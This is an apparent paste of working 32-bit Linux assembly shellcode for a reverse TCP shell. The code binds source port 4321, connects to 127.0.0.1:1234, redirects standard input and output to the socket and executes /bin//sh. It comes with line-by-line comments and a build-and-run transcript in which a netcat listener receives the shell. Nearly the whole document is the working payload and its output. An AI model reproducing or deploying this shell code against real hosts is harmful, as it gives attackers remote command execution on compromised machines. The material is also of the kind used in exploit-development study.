SH1NU11b1

#Reverse TCP shell that uses bind() to set a fixed source port

Dec 4th, 2015
  1. SERVER# cat sc.asm
  2. BITS 32
  3. section .txt ; non-standard section name (conventionally .text); the build transcript below shows it still links and runs
  4. global _start
      ;-----------------------------------------------------------------------
      ; _start: 32-bit Linux (i386) reverse TCP shell, NASM/Intel syntax.
      ; Sequence: socket() -> bind() to local port 4321 -> connect() to
      ; 127.0.0.1:1234 -> dup2() stdin/stdout/stderr onto the socket ->
      ; execve("/bin//sh").
      ; Network calls go through the i386 socketcall multiplexer:
      ;   eax = 102 (socketcall), ebx = subcall number, ecx = pointer to the
      ;   argument array built on the stack.  int 0x80 returns in eax and leaves
      ;   the other registers intact, which this code relies on (edx stays 0
      ;   from the cdq below all the way to execve).
      ; No syscall return value is checked.
      ; Analyst notes (all from the listing): fixed source port 4321, fixed
      ; destination 127.0.0.1:1234, dup2 of fds 2,1,0 onto a socket, and the
      ; "/bin//sh" path are the recognisable traits of this sample.
      ;-----------------------------------------------------------------------
  5. _start:
  6. ; sockfd=socket(AF_INET,SOCK_STREAM,0)
  7. ; sockfd=socket(2,1,0)
  8. push byte 0x66 ; socketcall number (102)
  9. pop eax
  10. cdq ; xor edx,edx -- eax is positive, so edx = 0; edx is never written again
  11. xor ebx,ebx
  12. inc ebx ; ebx=0x00000001 (socket)
  13. push edx ; edx=0x00000000 -- protocol = 0
  14. push byte 0x01 ; type = SOCK_STREAM
  15. push byte 0x02 ; domain = AF_INET; stack now holds [2,1,0]
  16. mov ecx,esp ; ecx = &args
  17. int 0x80 ; system call
  18. xchg esi,eax ; esi = sockfd (kept across the remaining calls)
  19. ; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  20. ; bind(sockfd,[2,4321,0],16)
  21. push byte 0x66 ; socketcall number (102)
  22. pop eax
  23. inc ebx ; ebx=0x00000002 (bind)
  24. push edx ; edx=0x00000000 (Any available source IP) -- sin_addr = INADDR_ANY
  25. push word 0xe110 ; source port = 4321 (0x10e1 in network byte order)
  26. push word bx ; 0x0002 -- sin_family = AF_INET; only 8 bytes of the 16-byte struct are built, sin_zero is whatever sits above on the stack
  27. mov ecx,esp ; ecx = &sin
  28. push byte 0x10 ; 16 -- addrlen
  29. push ecx ; &sin
  30. push esi ; sockfd
  31. mov ecx,esp ; ecx = &args
  32. int 0x80 ; system call -- result ignored
  33. ; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
  34. ; connect(sockfd,[2,1234,127.0.0.1],16)
  35. push byte 0x66 ; socketcall number (102)
  36. pop eax
  37. push dword 0x01bbbb7f ; 127.187.187.1 -- placeholder bytes, patched on the next two lines
  38. xor ecx,ecx
  39. mov word [esp+1],cx ; destination ip = 127.0.0.1 (the two 0xbb bytes are overwritten with zeros from cx)
  40. push word 0xd204 ; destination port = 1234 (0x04d2 in network byte order)
  41. push word bx ; 0x0002 -- sin_family = AF_INET (ebx is still 2 here)
  42. mov ecx,esp ; ecx = &sin
  43. push byte 0x10 ; 16 -- addrlen
  44. push ecx ; &sin
  45. push esi ; sockfd
  46. mov ecx,esp ; ecx = &args
  47. inc ebx ; ebx=0x00000003 (connect)
  48. int 0x80 ; system call -- result ignored
  49. xchg ebx,esi ; ebx = sockfd (first dup2 argument); esi = 3, unused from here on
  50. ; dup2(cfd,i)  for i = 2,1,0: redirect stderr, stdout, stdin to the socket
  51. push byte 0x2
  52. pop ecx ; ecx = 2, the first fd to redirect
  53. dup_loop:
  54. mov byte al,0x3f ; dup2 number (63) -- only al is written; assumes the upper 24 bits of eax are already 0 (connect() returned 0, then each dup2 returns a small fd)
  55. int 0x80 ; system call -- dup2(sockfd, ecx)
  56. dec ecx
  57. jns dup_loop ; repeat while ecx >= 0; exits after the ecx=0 iteration
  58. ; execve("/bin/sh",shell,NULL)
  59. xor eax,eax
  60. mov byte al,11 ; system call number (execve)
  61. push edx ; \0 -- string terminator (edx is still 0 from the cdq above)
  62. push long 0x68732f2f ; hs// -- "//sh"
  63. push long 0x6e69622f ; nib/ -- "/bin"; stack now holds "/bin//sh\0"
  64. mov ebx,esp ; first parameter -- filename
  65. push edx ; NULL
  66. mov edx,esp ; third parameter -- envp points at that NULL (empty environment)
  67. push ebx ; argv[0] = filename; the NULL pushed just before is argv[1]
  68. mov ecx,esp ; second parameter -- argv
  69. int 0x80 ; system call -- does not return on success
  70.  
  71. SERVER# nasm -f elf sc.asm && ld -o sc sc.o
  72. CLIENT# nc -lv 127.0.0.1 1234
  73. SERVER# ./sc
  74.  
  75. Connection from [127.0.0.1] port 1234 [tcp/*] accepted (family 2, sport 4321)
  76. hostname
  77. SERVER
  78. exit
  79. CLIENT#